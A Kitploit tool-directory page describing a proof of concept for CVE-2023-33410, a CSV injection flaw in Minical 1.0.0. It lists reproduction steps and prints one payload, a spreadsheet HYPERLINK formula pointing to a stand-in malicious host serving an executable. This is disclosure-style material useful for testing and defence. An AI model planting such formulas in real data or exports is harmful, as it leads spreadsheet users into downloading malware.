Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/thirukrishnan/cve-2023-33410
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthirukrishnan/cve-2023-33410

CVE-2023-33410

Proof-of-concept demonstrating CSV injection vulnerability in Minical 1.0.0, with step-by-step reproduction steps and payload example.

View Repository
13 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-33410

Minical 1.0.0 is vulnerable to CSV Injection.

Vendor: https://github.com/minical/minical

Demo Application: https://demo.minical.io/


PoC

Step 1: Navigate to the Accounting module and click on Create New Customer.

image

Step 2: Enter the payload in the Name field and Click on Create.

Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")

image

image

Step 3: Click on Download CSV Report and Observe the payload getting rendered.

image

Download Tool